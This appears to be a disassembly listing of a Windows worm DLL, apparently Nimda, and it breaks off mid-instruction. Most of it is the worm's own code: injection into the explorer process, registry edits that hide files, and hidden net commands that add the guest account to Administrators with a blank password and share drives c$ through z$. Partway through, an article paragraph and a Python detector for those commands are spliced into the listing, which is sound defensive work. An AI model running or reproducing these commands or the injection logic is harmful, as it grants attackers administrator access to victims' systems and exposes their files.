esi, ds:strncpy 36171D53 mov edi, 400h 36171D58 push edi 36171D59 push [esp+0Ch+arg_4] 36171D5D push offset byte_3617A818 36171D62 call esi ; strncpy 36171D64 push edi 36171D65 push [esp+18h+arg_0] 36171D69 push offset byte_3617A418 36171D6E call esi ; strncpy 36171D70 add esp, 18h 36171D73 push 1 36171D75 pop eax 36171D76 pop edi 36171D77 pop esi 36171D78 retn 36171D79 ; ─────────────────────────────────────────────────────────────────────────── 36171D79 36171D79 loc_36171D79: ; CODE XREF: sub_36171D43+6j 36171D79 xor eax, eax 36171D7B retn 36171D7B sub_36171D43 endp 36171D7B 36171D7C 36171D7C ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36171D7C 36171D7C ; Attributes: bp-based frame 36171D7C 36171D7C sub_36171D7C proc near ; CODE XREF: _DllMain@12+18Ap 36171D7C 36171D7C var_B0 = byte ptr -0B0h 36171D7C var_A7 = byte ptr -0A7h 36171D7C var_30 = byte ptr -30h 36171D7C var_2C = byte ptr -2Ch 36171D7C var_20 = dword ptr -20h 36171D7C var_18 = dword ptr -18h 36171D7C var_10 = byte ptr -10h 36171D7C var_C = byte ptr -0Ch 36171D7C var_8 = dword ptr -8 36171D7C var_4 = dword ptr -4 36171D7C 36171D7C push ebp 36171D7D mov ebp, esp 36171D7F sub esp, 0B0h 36171D85 push ebx 36171D86 push esi 36171D87 push edi 36171D88 mov esi, offset explorer ; "EXPLORER" 36171D8D lea edi, [ebp+var_B0] 36171D93 push 1Dh 36171D95 movsd 36171D96 movsd 36171D97 movsb 36171D98 pop ecx 36171D99 xor eax, eax 36171D9B lea edi, [ebp+var_A7] 36171DA1 xor ebx, ebx 36171DA3 repe stosd 36171DA5 cmp dword_3617ACB0, ebx 36171DAB stosw 36171DAD stosb 36171DAE jz loc_36171EEF 36171DB4 call sub_36172230 36171DB9 mov edi, eax 36171DBB cmp edi, ebx 36171DBD mov esi, edi 36171DBF jz loc_36171EFE 36171DC5 36171DC5 loc_36171DC5: ; CODE XREF: sub_36171D7C+66j 36171DC5 lea eax, [ebp+var_B0] 36171DCB push eax 36171DCC lea eax, [esi+8] 36171DCF push eax 36171DD0 call ds:lstrcmpiA 36171DD6 test eax, eax 36171DD8 jz short loc_36171DE4 36171DDA mov esi, [esi+110h] 36171DE0 cmp esi, ebx 
36171DE2 jnz short loc_36171DC5 36171DE4 36171DE4 loc_36171DE4: ; CODE XREF: sub_36171D7C+5Cj 36171DE4 cmp esi, ebx 36171DE6 jz loc_36171EFE 36171DEC mov esi, [esi] 36171DEE push edi 36171DEF call sub_3617223F 36171DF4 pop ecx 36171DF5 call ds:GetCurrentProcessId 36171DFB cmp eax, esi 36171DFD jz loc_36171EFE 36171E03 push esi 36171E04 push ebx 36171E05 push 1F0FFFh 36171E0A call ds:OpenProcess 36171E10 mov edi, eax 36171E12 cmp edi, ebx 36171E14 jz loc_36171EFE 36171E1A push 8000h 36171E1F push ebx 36171E20 push dword_3617ACAC 36171E26 push edi 36171E27 call dword_3617D5D8 36171E2D mov eax, dword_3617ACAC 36171E32 push 40h 36171E34 push 3000h 36171E39 mov ecx, [eax+3Ch] 36171E3C mov ecx, [ecx+eax+50h] 36171E40 push ecx 36171E41 push eax 36171E42 push edi 36171E43 call dword_3617D5DC 36171E49 cmp eax, ebx 36171E4B mov [ebp+var_4], eax 36171E4E jz loc_36171EFE 36171E54 lea ecx, [ebp+var_2C] 36171E57 push 1Ch 36171E59 push ecx 36171E5A push eax 36171E5B push edi 36171E5C call dword_3617D5D4 36171E62 cmp [ebp+var_18], 1 36171E66 jz short loc_36171EC9 36171E68 mov esi, 1000h 36171E6D 36171E6D loc_36171E6D: ; CODE XREF: sub_36171D7C+14Bj 36171E6D mov eax, [ebp+var_20] 36171E70 cmp eax, ebx 36171E72 jz short loc_36171EC9 36171E74 test byte ptr [ebp+var_18+1], 1 36171E78 jnz short loc_36171EB0 36171E7A cmp eax, ebx 36171E7C mov [ebp+var_8], ebx 36171E7F jbe short loc_36171EB0 36171E81 mov ebx, [ebp+var_4] 36171E84 36171E84 loc_36171E84: ; CODE XREF: sub_36171D7C+130j 36171E84 lea eax, [ebp+var_30] 36171E87 push eax 36171E88 push 40h 36171E8A push esi 36171E8B push ebx 36171E8C push edi 36171E8D call dword_3617D5D0 36171E93 lea eax, [ebp+var_C] 36171E96 push eax 36171E97 push esi 36171E98 push ebx 36171E99 push ebx 36171E9A push edi 36171E9B call ds:WriteProcessMemory 36171EA1 add [ebp+var_8], esi 36171EA4 mov eax, [ebp+var_20] 36171EA7 add ebx, esi 36171EA9 cmp [ebp+var_8], eax 36171EAC jb short loc_36171E84 36171EAE xor ebx, ebx 36171EB0 36171EB0 loc_36171EB0: ; CODE 
XREF: sub_36171D7C+FCj 36171EB0 ; sub_36171D7C+103j 36171EB0 add [ebp+var_4], eax 36171EB3 lea eax, [ebp+var_2C] 36171EB6 push 1Ch 36171EB8 push eax 36171EB9 push [ebp+var_4] 36171EBC push edi 36171EBD call dword_3617D5D4 36171EC3 cmp [ebp+var_18], 1 36171EC7 jnz short loc_36171E6D 36171EC9 36171EC9 loc_36171EC9: ; CODE XREF: sub_36171D7C+EAj 36171EC9 ; sub_36171D7C+F6j 36171EC9 lea eax, [ebp+var_10] 36171ECC push eax 36171ECD push ebx 36171ECE push dword_3617ACAC 36171ED4 push offset sub_36171F05 36171ED9 push ebx 36171EDA push ebx 36171EDB push edi 36171EDC call dword_3617D5E0 36171EE2 test eax, eax 36171EE4 jz short loc_36171EFE 36171EE6 push edi 36171EE7 call ds:CloseHandle 36171EED jmp short loc_36171EFE 36171EEF ; ─────────────────────────────────────────────────────────────────────────── 36171EEF 36171EEF loc_36171EEF: ; CODE XREF: sub_36171D7C+32j 36171EEF push 1 36171EF1 call ds:GetCurrentProcessId 36171EF7 push eax 36171EF8 call dword_3617D5CC 36171EFE 36171EFE loc_36171EFE: ; CODE XREF: sub_36171D7C+43j 36171EFE ; sub_36171D7C+6Aj ... 
36171EFE pop edi 36171EFF pop esi 36171F00 xor eax, eax 36171F02 pop ebx 36171F03 leave 36171F04 retn 36171F04 sub_36171D7C endp 36171F04 36171F05 36171F05 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36171F05 36171F05 36171F05 sub_36171F05 proc near ; CODE XREF: _DllMain@12+1A1p 36171F05 ; DATA XREF: sub_36171D7C+158o 36171F05 36171F05 var_1AC = dword ptr -1ACh 36171F05 var_1A0 = byte ptr -1A0h 36171F05 36171F05 sub esp, 194h 36171F0B push ebx 36171F0C push ebp 36171F0D push esi 36171F0E push edi 36171F0F call K32_imports 36171F14 xor edi, edi 36171F16 push offset aFsdhqherwqi200 ; "fsdhqherwqi2001" 36171F1B push edi 36171F1C push edi 36171F1D call ds:CreateMutexA 36171F23 push 0FFFFFFFFh 36171F25 mov esi, eax 36171F27 call ds:GetCurrentThread 36171F2D push eax 36171F2E call ds:SetThreadPriority 36171F34 mov eax, dword_3617ACB4 36171F39 cmp eax, edi 36171F3B jz short loc_36171F44 36171F3D push eax 36171F3E call dword_3617AC78 36171F44 36171F44 loc_36171F44: ; CODE XREF: sub_36171F05+36j 36171F44 push edi 36171F45 push 80000h 36171F4A push edi 36171F4B call dword_3617AC7C 36171F51 cmp eax, edi 36171F53 mov dword_3617ACB4, eax 36171F58 jnz short loc_36171F70 36171F5A push esi 36171F5B call ds:CloseHandle 36171F61 pop edi 36171F62 pop esi 36171F63 pop ebp 36171F64 xor eax, eax 36171F66 pop ebx 36171F67 add esp, 194h 36171F6D retn 4 36171F70 ; ─────────────────────────────────────────────────────────────────────────── 36171F70 36171F70 loc_36171F70: ; CODE XREF: sub_36171F05+53j 36171F70 lea eax, [esp+1B4h+var_1A0] 36171F74 push eax 36171F75 push 202h 36171F7A call dword_3617AC68 36171F80 call ds:GetTickCount 36171F86 push eax 36171F87 call ds:srand 36171F8D pop ecx 36171F8E call sub_361737C9 36171F93 mov ebx, ds:Sleep 36171F99 mov ebp, 7530h 36171F9E push ebp 36171F9F call ebx ; Sleep 36171FA1 cmp dword_3617ACB0, edi 36171FA7 jz short loc_36171FCB 36171FA9 call sub_36176F10 36171FAE mov eax, dword_3617D708 36171FB3 cmp eax, edi 
36171FB5 jnz short loc_36171FBB 36171FB7 push 3Ch 36171FB9 jmp short loc_36171FC5 36171FBB ; ─────────────────────────────────────────────────────────────────────────── 36171FBB 36171FBB loc_36171FBB: ; CODE XREF: sub_36171F05+B0j 36171FBB cmp eax, 63h 36171FBE jnz short loc_36171FCB 36171FC0 push 0C8h 36171FC5 36171FC5 loc_36171FC5: ; CODE XREF: sub_36171F05+B4j 36171FC5 call sub_36172D72 36171FCA pop ecx 36171FCB 36171FCB loc_36171FCB: ; CODE XREF: sub_36171F05+A2j 36171FCB ; sub_36171F05+B9j 36171FCB mov esi, ds:HeapCompact 36171FD1 36171FD1 loc_36171FD1: ; CODE XREF: sub_36171F05+163j 36171FD1 push ebp 36171FD2 call ebx ; Sleep 36171FD4 cmp dword_3617ACB0, edi 36171FDA jz short loc_36171FFA 36171FDC cmp dword_3617D708, 63h 36171FE3 jnz short loc_36171FEA 36171FE5 call sub_36173325 36171FEA 36171FEA loc_36171FEA: ; CODE XREF: sub_36171F05+DEj 36171FEA push edi 36171FEB push dword_3617ACB4 36171FF1 call esi ; HeapCompact 36171FF3 call sub_36174E10 36171FF8 jmp short loc_36171FFF 36171FFA ; ─────────────────────────────────────────────────────────────────────────── 36171FFA 36171FFA loc_36171FFA: ; CODE XREF: sub_36171F05+D5j 36171FFA call sub_36176C52 36171FFF 36171FFF loc_36171FFF: ; CODE XREF: sub_36171F05+F3j 36171FFF push edi 36172000 push dword_3617ACB4 36172006 call esi ; HeapCompact 36172008 call sub_36174F1E 3617200D push edi 3617200E push dword_3617ACB4 36172014 call esi ; HeapCompact 36172016 push edi 36172017 call sub_36176D58 3617201C push edi 3617201D push dword_3617ACB4 36172023 call esi ; HeapCompact 36172025 cmp dword_3617ACB0, edi 3617202B jz short loc_3617203B 3617202D cmp dword_3617D708, 63h 36172034 jz short loc_3617203B 36172036 call sub_36173325 3617203B 3617203B loc_3617203B: ; CODE XREF: sub_36171F05+126j 3617203B ; sub_36171F05+12Fj 3617203B call sub_3617548D 36172040 push edi 36172041 push dword_3617ACB4 36172047 call esi ; HeapCompact 36172049 call sub_3617206D 3617204E mov [esp+1BCh+var_1AC], 18h 36172056 36172056 loc_36172056: ; CODE 
XREF: sub_36171F05+15Aj 36172056 call sub_36176E91 3617205B dec [esp+1BCh+var_1AC] 3617205F jnz short loc_36172056 36172061 push 2BF20h 36172066 call ebx ; Sleep 36172068 jmp loc_36171FD1 36172068 sub_36171F05 endp 36172068 3617206D 3617206D ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617206D 3617206D ; Attributes: bp-based frame 3617206D 3617206D sub_3617206D proc near ; CODE XREF: sub_36171F05+144p 3617206D 3617206D var_328 = byte ptr -328h 3617206D var_128 = byte ptr -128h 3617206D var_28 = byte ptr -28h 3617206D var_22 = byte ptr -22h 3617206D var_1F = byte ptr -1Fh 3617206D var_18 = dword ptr -18h 3617206D var_14 = dword ptr -14h 3617206D var_10 = dword ptr -10h 3617206D var_C = dword ptr -0Ch 3617206D var_8 = dword ptr -8 3617206D var_1 = byte ptr -1 3617206D 3617206D push ebp 3617206E mov ebp, esp 36172070 sub esp, 328h 36172076 push ebx 36172077 push esi 36172078 lea eax, [ebp+var_C] 3617207B push edi 3617207C push eax 3617207D xor ebx, ebx 3617207F push 0F003Fh 36172084 push ebx 36172085 push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Windows\\CurrentVersi"... 
3617208A push 80000001h 3617208F call ds:RegOpenKeyExA 36172095 test eax, eax 36172097 jnz short loc_361720E8 36172099 push 4 3617209B lea eax, [ebp+var_8] 3617209E pop edi 3617209F mov esi, ds:RegSetValueExA 361720A5 push edi 361720A6 push eax 361720A7 push edi 361720A8 push ebx 361720A9 push offset aHidden ; "Hidden" 361720AE mov [ebp+var_8], ebx 361720B1 push [ebp+var_C] 361720B4 call esi ; RegSetValueExA 361720B6 lea eax, [ebp+var_8] 361720B9 push edi 361720BA push eax 361720BB push edi 361720BC push ebx 361720BD push offset aShowsuperhidde ; "ShowSuperHidden" 361720C2 push [ebp+var_C] 361720C5 call esi ; RegSetValueExA 361720C7 lea eax, [ebp+var_8] 361720CA push edi 361720CB push eax 361720CC push edi 361720CD push ebx 361720CE push offset aHidefileext ; "HideFileExt" 361720D3 push [ebp+var_C] 361720D6 mov [ebp+var_8], 1 361720DD call esi ; RegSetValueExA 361720DF push [ebp+var_C] 361720E2 call ds:RegCloseKey 361720E8 361720E8 loc_361720E8: ; CODE XREF: sub_3617206D+2Aj 361720E8 cmp dword_3617ACB0, ebx 361720EE jz loc_3617222B 361720F4 push ebx 361720F5 push ebx 361720F6 mov esi, offset aNet ; "net" 361720FB push offset aUserGuestAdd ; "user guest /add" 36172100 mov edi, offset aOpen ; "open" 36172105 push esi 36172106 push edi 36172107 push ebx 36172108 call dword_3617AC94 3617210E push ebx 3617210F push ebx 36172110 push offset aUserGuestActiv ; "user guest /active" 36172115 push esi 36172116 push edi 36172117 push ebx 36172118 call dword_3617AC94 3617211E push ebx 3617211F push ebx 36172120 push offset aLocalgroupGues ; "localgroup Guests guest /add" 36172125 push esi 36172126 push edi 36172127 push ebx 36172128 call dword_3617AC94 3617212E push ebx 3617212F push ebx 36172130 push offset aLocalgroupAdmi ; "localgroup Administrators guest /add" 36172135 push esi 36172136 push edi 36172137 push ebx 36172138 call dword_3617AC94 3617213E push ebx 3617213F push ebx 36172140 push offset aUserGuest ; "user guest \"\"" 36172145 push esi 36172146 push edi 36172147 
push ebx 36172148 call dword_3617AC94 3617214E mov al, 63h 36172150 mov [ebp+var_1], al 36172153 jmp short loc_36172158 36172155 ; ─────────────────────────────────────────────────────────────────────────── 36172155 36172155 loc_36172155: ; CODE XREF: sub_3617206D+11Ej 36172155 mov al, [ebp+var_1] 36172158 36172158 loc_36172158: ; CODE XREF: sub_3617206D+E6j 36172158 mov esi, offset aShareCC ; "share c$=c:\\" 3617215D lea edi, [ebp+var_28] 36172160 movsd 36172161 movsd 36172162 movsd 36172163 movsb 36172164 mov [ebp+var_22], al 36172167 mov [ebp+var_1F], al 3617216A push ebx 3617216B lea eax, [ebp+var_28] 3617216E push ebx 3617216F push eax 36172170 push offset aNet ; "net" 36172175 push offset aOpen ; "open" 3617217A push ebx 3617217B call dword_3617AC94 36172181 inc [ebp+var_1] 36172184 mov al, [ebp+var_1] 36172187 sub al, 63h 36172189 cmp al, 18h 3617218B jl short loc_36172155 3617218D lea eax, [ebp+var_8] 36172190 mov edi, 1FEh 36172195 push eax 36172196 push 0F003Fh 3617219B push ebx 3617219C push offset aSystemCurren_2 ; "SYSTEM\\CurrentControlSet\\Services\\lanma"... 
361721A1 push 80000002h 361721A6 mov [ebp+var_10], 0FFh 361721AD mov [ebp+var_14], edi 361721B0 call ds:RegOpenKeyExA 361721B6 test eax, eax 361721B8 jnz short loc_3617222B 361721BA lea eax, [ebp+var_14] 361721BD mov esi, ds:RegEnumValueA 361721C3 push eax 361721C4 lea eax, [ebp+var_328] 361721CA push eax 361721CB push ebx 361721CC lea eax, [ebp+var_10] 361721CF push ebx 361721D0 push eax 361721D1 lea eax, [ebp+var_128] 361721D7 push eax 361721D8 push ebx 361721D9 push [ebp+var_8] 361721DC mov [ebp+var_18], ebx 361721DF 361721DF loc_361721DF: ; CODE XREF: sub_3617206D+1B3j 361721DF call esi ; RegEnumValueA 361721E1 test eax, eax 361721E3 jnz short loc_36172222 361721E5 lea eax, [ebp+var_128] 361721EB push eax 361721EC push [ebp+var_8] 361721EF call ds:RegDeleteKeyA 361721F5 lea eax, [ebp+var_14] 361721F8 inc [ebp+var_18] 361721FB push eax 361721FC lea eax, [ebp+var_328] 36172202 push eax 36172203 push ebx 36172204 lea eax, [ebp+var_10] 36172207 push ebx 36172208 push eax 36172209 lea eax, [ebp+var_128] 3617220F push eax 36172210 mov [ebp+var_10], 0FFh 36172217 push [ebp+var_18] 3617221A mov [ebp+var_14], edi 3617221D push [ebp+var_8] 36172220 jmp short loc_361721DF 36172222 ; ─────────────────────────────────────────────────────────────────────────── 36172222 36172222 loc_36172222: ; CODE XREF: sub_3617206D+176j 36172222 push [ebp+var_8] 36172225 call ds:RegCloseKey 3617222B 3617222B loc_3617222B: ; CODE XREF: sub_3617206D+81j 3617222B ; sub_3617206D+14Bj 3617222B pop edi 3617222C pop esi 3617222D pop ebx 3617222E leave 3617222F retn 3617222F sub_3617206D endp 3617222F 36172230 36172230 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172230 36172230 36172230 sub_36172230 proc near ; CODE XREF: sub_36171D7C+38p 36172230 call sub_36172278 36172235 test eax, eax 36172237 jnz short loc_3617223A 36172239 retn 3617223A ; ─────────────────────────────────────────────────────────────────────────── 3617223A 3617223A loc_3617223A: ; CODE XREF: 
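The run of calls through dword_3617AC94 in sub_3617206D is, reading the argument order (0, "open", "net", params, 0, 0), consistent with a ShellExecuteA-style call with the window hidden; the parameter strings are right there in the listing: user guest /add, user guest /active, localgroup Guests guest /add, localgroup Administrators guest /add, user guest "" and then share X$=X:\ for every letter from c to z (the loop at 36172155..3617218B runs 0x18 times). Before that the routine stores Hidden = 0, ShowSuperHidden = 0 and HideFileExt = 1 (per the var_8 stores) under an HKCU Software\Microsoft\Windows\CurrentVersion\... key whose name is truncated in the listing, so the dropped files stay out of sight. Any one of those net commands launched from a non-interactive parent is a strong signal by itself, and the whole burst inside a few seconds is the worm's signature. The Python below is an added detection example written for this article, not from the original analysis and not the worm's code: it runs rules derived from those strings over constructed process-creation events in a made-up one-line format and raises one alert per parent process when several distinct rules fire within a two-minute window. Host names, PIDs and timestamps in the sample are invented for the test.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Command strings lifted from sub_3617206D ("net" + the parameter
# constants), matched after lower-casing and collapsing whitespace.
RULES = [
    ("guest-add",        re.compile(r"^net(?:\.exe)?\s+user\s+guest\s+/add\b")),
    ("guest-enable",     re.compile(r"^net(?:\.exe)?\s+user\s+guest\s+/active(?!:no\b)")),
    ("guest-blank-pw",   re.compile(r'^net(?:\.exe)?\s+user\s+guest\s+""\s*$')),
    ("guest-to-guests",  re.compile(r"^net(?:\.exe)?\s+localgroup\s+guests\s+guest\s+/add\b")),
    ("guest-to-admins",  re.compile(r"^net(?:\.exe)?\s+localgroup\s+administrators\s+guest\s+/add\b")),
    # "share c$=c:\" is issued for each letter c..z, so match any
    # <letter>$=<letter>:\ share creation.
    ("drive-root-share", re.compile(r"^net(?:\.exe)?\s+share\s+([a-z])\$=\1:\\")),
]

# Constructed telemetry format (invented for this example): one process
# creation per line.
EVENT_RE = re.compile(
    r'^(\S+) host=(\S+) pid=(\d+) ppid=(\d+) parent=(\S+) image=(\S+) cmdline="(.*)"$')

SAMPLE_LOG = '''\
2001-09-18T10:02:11 host=SRV1 pid=412 ppid=388 parent=explorer.exe image=net.exe cmdline="net user guest /add"
2001-09-18T10:02:12 host=SRV1 pid=416 ppid=388 parent=explorer.exe image=net.exe cmdline="net user guest /active"
2001-09-18T10:02:12 host=SRV1 pid=420 ppid=388 parent=explorer.exe image=net.exe cmdline="net localgroup Guests guest /add"
2001-09-18T10:02:13 host=SRV1 pid=424 ppid=388 parent=explorer.exe image=net.exe cmdline="net localgroup Administrators guest /add"
2001-09-18T10:02:13 host=SRV1 pid=428 ppid=388 parent=explorer.exe image=net.exe cmdline="net user guest """
2001-09-18T10:02:14 host=SRV1 pid=432 ppid=388 parent=explorer.exe image=net.exe cmdline="net share c$=c:\\"
2001-09-18T10:02:15 host=SRV1 pid=436 ppid=388 parent=explorer.exe image=net.exe cmdline="net share d$=d:\\"
2001-09-18T10:30:00 host=WS7 pid=900 ppid=640 parent=cmd.exe image=net.exe cmdline="net user guest /active:no"
2001-09-18T10:31:05 host=WS7 pid=904 ppid=640 parent=cmd.exe image=net.exe cmdline="net share projects=d:\\projects"
'''


def parse_event(line: str):
    """Return a dict for one telemetry line, or None if it does not parse."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ts, host, pid, ppid, parent, image, cmdline = m.groups()
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"),
        "host": host, "pid": int(pid), "ppid": int(ppid),
        "parent": parent, "image": image, "cmdline": cmdline,
    }


def classify(cmdline: str):
    """Names of every rule the (normalised) command line triggers."""
    cmd = " ".join(cmdline.split()).lower()
    return [name for name, rx in RULES if rx.search(cmd)]


def analyze(log_text: str, window=timedelta(seconds=120), min_rules=3):
    """Return (hits, alerts): hits is every (ts, host, rule) match; alerts
    is one entry per (host, parent pid) that fired >= min_rules distinct
    rules inside `window`, which is the burst pattern of sub_3617206D."""
    hits, by_origin = [], defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        for rule in classify(ev["cmdline"]):
            hits.append((ev["ts"], ev["host"], rule))
            by_origin[(ev["host"], ev["ppid"])].append((ev["ts"], rule))
    alerts = []
    for (host, ppid), events in by_origin.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            rules = {r for t, r in events[i:] if t - t0 <= window}
            if len(rules) >= min_rules:
                alerts.append({"host": host, "ppid": ppid,
                               "first_seen": t0, "rules": sorted(rules)})
                break
    return hits, alerts


if __name__ == "__main__":
    hits, alerts = analyze(SAMPLE_LOG)
    for ts, host, rule in hits:
        print(ts, host, rule)
    for a in alerts:
        print("ALERT", a["host"], "ppid", a["ppid"], a["rules"])
```

Feeding real EDR or Sysmon event 1 data into this only needs a different parse_event; the rules and the per-parent burst correlation stay the same. The /active:no exclusion keeps an administrator disabling the Guest account from counting as a hit.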
sub_36172230+7j 3617223A jmp loc_36172286 3617223A sub_36172230 endp 3617223A 3617223F 3617223F ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617223F 3617223F 3617223F sub_3617223F proc near ; CODE XREF: sub_36171D7C+73p 3617223F 3617223F arg_0 = dword ptr 8 3617223F 3617223F push esi 36172240 mov esi, [esp+arg_0] 36172244 test esi, esi 36172246 jz short loc_36172276 36172248 push ebx 36172249 mov ebx, ds:free 3617224F push edi 36172250 36172250 loc_36172250: ; CODE XREF: sub_3617223F+33j 36172250 mov eax, [esi+4] 36172253 test eax, eax 36172255 jz short loc_36172264 36172257 36172257 loc_36172257: ; CODE XREF: sub_3617223F+23j 36172257 mov edi, [eax+4] 3617225A push eax 3617225B call ebx ; free 3617225D test edi, edi 3617225F pop ecx 36172260 mov eax, edi 36172262 jnz short loc_36172257 36172264 36172264 loc_36172264: ; CODE XREF: sub_3617223F+16j 36172264 mov edi, [esi+110h] 3617226A push esi 3617226B call ebx ; free 3617226D test edi, edi 3617226F pop ecx 36172270 mov esi, edi 36172272 jnz short loc_36172250 36172274 pop edi 36172275 pop ebx 36172276 36172276 loc_36172276: ; CODE XREF: sub_3617223F+7j 36172276 pop esi 36172277 retn 36172277 sub_3617223F endp 36172277 36172278 36172278 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172278 36172278 36172278 sub_36172278 proc near ; CODE XREF: sub_36172230p 36172278 call sub_361723F1 3617227D call sub_36172494 36172282 push 1 36172284 pop eax 36172285 retn 36172285 sub_36172278 endp 36172285 36172286 ; ─────────────────────────────────────────────────────────────────────────── 36172286 36172286 loc_36172286: ; CODE XREF: sub_36172230+Aj 36172286 push ebp 36172287 mov ebp, esp 36172289 sub esp, 128h 3617228F push ebx 36172290 push esi 36172291 lea eax, [ebp-14h] 36172294 push edi 36172295 xor ebx, ebx 36172297 push eax 36172298 push ebx 36172299 push offset byte_3617D604 3617229E push dword_36179484 361722A4 mov dword ptr [ebp-14h], 0C800h 361722AB 
call sub_36172A08 361722B0 push dword_3617D5C8 361722B6 mov [ebp-10h], eax 361722B9 mov [ebp-18h], ebx 361722BC push eax 361722BD call sub_36172A2B 361722C2 push dword_3617D5A8 361722C8 mov [ebp-4], eax 361722CB push eax 361722CC call sub_36172A5E 361722D1 push dword ptr [ebp-4] 361722D4 mov [ebp-0Ch], eax 361722D7 lea esi, [ebp-128h] 361722DD call sub_36172A91 361722E2 add esp, 24h 361722E5 mov edi, eax 361722E7 mov [ebp-8], ebx 361722EA 361722EA loc_361722EA: ; CODE XREF: .text:36172349j 361722EA cmp edi, ebx 361722EC jz short loc_3617234B 361722EE mov eax, [ebp-4] 361722F1 mov ecx, [ebp-8] 361722F4 cmp ecx, [eax+28h] 361722F7 jge short loc_3617234B 361722F9 push 114h 361722FE call ds:malloc 36172304 cmp eax, ebx 36172306 pop ecx 36172307 mov [esi+110h], eax 3617230D jz loc_361723E5 36172313 push dword ptr [ebp-0Ch] 36172316 mov esi, eax 36172318 push edi 36172319 call sub_36172AA2 3617231E mov eax, [eax] 36172320 push edi 36172321 mov [esi], eax 36172323 call sub_36172ABD 36172328 push eax 36172329 lea eax, [esi+8] 3617232C push offset aLs ; "%ls" 36172331 push eax 36172332 call ds:sprintf 36172338 push edi 36172339 mov [esi+4], ebx 3617233C call sub_36172ACE 36172341 add esp, 1Ch 36172344 inc dword ptr [ebp-8] 36172347 mov edi, eax 36172349 jmp short loc_361722EA 3617234B ; ─────────────────────────────────────────────────────────────────────────── 3617234B 3617234B loc_3617234B: ; CODE XREF: .text:361722ECj 3617234B ; .text:361722F7j 3617234B mov [esi+110h], ebx 36172351 push dword_3617D570 36172357 push dword ptr [ebp-10h] 3617235A call sub_36172A2B 3617235F push dword_3617D54C 36172365 mov [ebp-4], eax 36172368 push eax 36172369 call sub_36172A5E 3617236E push dword ptr [ebp-4] 36172371 mov [ebp-0Ch], eax 36172374 call sub_36172A91 36172379 add esp, 14h 3617237C and dword ptr [ebp-8], 0 36172380 mov ebx, eax 36172382 36172382 loc_36172382: ; CODE XREF: .text:361723E3j 36172382 test ebx, ebx 36172384 jz short loc_361723E9 36172386 mov ecx, [ebp-4] 36172389 
mov eax, [ebp-8] 3617238C cmp eax, [ecx+28h] 3617238F jge short loc_361723E9 36172391 mov eax, [ebx+8] 36172394 mov edi, [ebp-18h] 36172397 xor ecx, ecx 36172399 test eax, eax 3617239B jle short loc_361723AC 3617239D 3617239D loc_3617239D: ; CODE XREF: .text:361723AAj 3617239D mov edi, [edi+110h] 361723A3 test edi, edi 361723A5 jz short loc_361723D7 361723A7 inc ecx 361723A8 cmp ecx, eax 361723AA jl short loc_3617239D 361723AC 361723AC loc_361723AC: ; CODE XREF: .text:3617239Bj 361723AC test edi, edi 361723AE jz short loc_361723D7 361723B0 push 8 361723B2 call ds:malloc 361723B8 mov esi, eax 361723BA pop ecx 361723BB test esi, esi 361723BD jz short loc_361723E5 361723BF push dword ptr [ebp-0Ch] 361723C2 mov eax, [edi+4] 361723C5 mov [esi+4], eax 361723C8 mov [edi+4], esi 361723CB push ebx 361723CC call sub_36172AA2 361723D1 mov eax, [eax] 361723D3 pop ecx 361723D4 pop ecx 361723D5 mov [esi], eax 361723D7 361723D7 loc_361723D7: ; CODE XREF: .text:361723A5j 361723D7 ; .text:361723AEj 361723D7 push ebx 361723D8 call sub_36172ACE 361723DD inc dword ptr [ebp-8] 361723E0 pop ecx 361723E1 mov ebx, eax 361723E3 jmp short loc_36172382 361723E5 ; ─────────────────────────────────────────────────────────────────────────── 361723E5 361723E5 loc_361723E5: ; CODE XREF: .text:3617230Dj 361723E5 ; .text:361723BDj 361723E5 xor eax, eax 361723E7 jmp short loc_361723EC 361723E9 ; ─────────────────────────────────────────────────────────────────────────── 361723E9 361723E9 loc_361723E9: ; CODE XREF: .text:36172384j 361723E9 ; .text:3617238Fj 361723E9 mov eax, [ebp-18h] 361723EC 361723EC loc_361723EC: ; CODE XREF: .text:361723E7j 361723EC pop edi 361723ED pop esi 361723EE pop ebx 361723EF leave 361723F0 retn 361723F1 361723F1 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361723F1 361723F1 ; Attributes: bp-based frame 361723F1 361723F1 sub_361723F1 proc near ; CODE XREF: sub_36172278p 361723F1 361723F1 var_18 = byte ptr -18h 361723F1 var_17 = byte ptr 
-17h 361723F1 var_4 = dword ptr -4 361723F1 361723F1 push ebp 361723F2 mov ebp, esp 361723F4 sub esp, 18h 361723F7 mov eax, dword_36179484 361723FC push ebx 361723FD mov ebx, ds:RegCloseKey 36172403 push esi 36172404 push edi 36172405 mov edi, 80000004h 3617240A cmp eax, edi 3617240C mov [ebp+var_4], 12h 36172413 jz short loc_36172418 36172415 push eax 36172416 call ebx ; RegCloseKey 36172418 36172418 loc_36172418: ; CODE XREF: sub_361723F1+22j 36172418 mov eax, dword_36179488 3617241D mov esi, 80000002h 36172422 cmp eax, esi 36172424 jz short loc_36172429 36172426 push eax 36172427 call ebx ; RegCloseKey 36172429 36172429 loc_36172429: ; CODE XREF: sub_361723F1+33j 36172429 lea eax, [ebp+var_4] 3617242C mov dword_36179484, edi 36172432 push eax 36172433 lea eax, [ebp+var_18] 36172436 push eax 36172437 mov dword_36179488, esi 3617243D call ds:GetComputerNameA 36172443 cmp [ebp+var_18], 5Ch 36172447 jnz short loc_3617246B 36172449 cmp [ebp+var_17], 5Ch 3617244D jnz short loc_3617246B 3617244F mov edi, ds:lstrcpyA 36172455 lea eax, [ebp+var_18] 36172458 mov esi, offset byte_3617D618 3617245D push eax 3617245E push esi 3617245F call edi ; lstrcpyA 36172461 push esi 36172462 push offset byte_3617D62C 36172467 call edi ; lstrcpyA 36172469 jmp short loc_3617248F 3617246B ; ─────────────────────────────────────────────────────────────────────────── 3617246B 3617246B loc_3617246B: ; CODE XREF: sub_361723F1+56j 3617246B ; sub_361723F1+5Cj 3617246B lea eax, 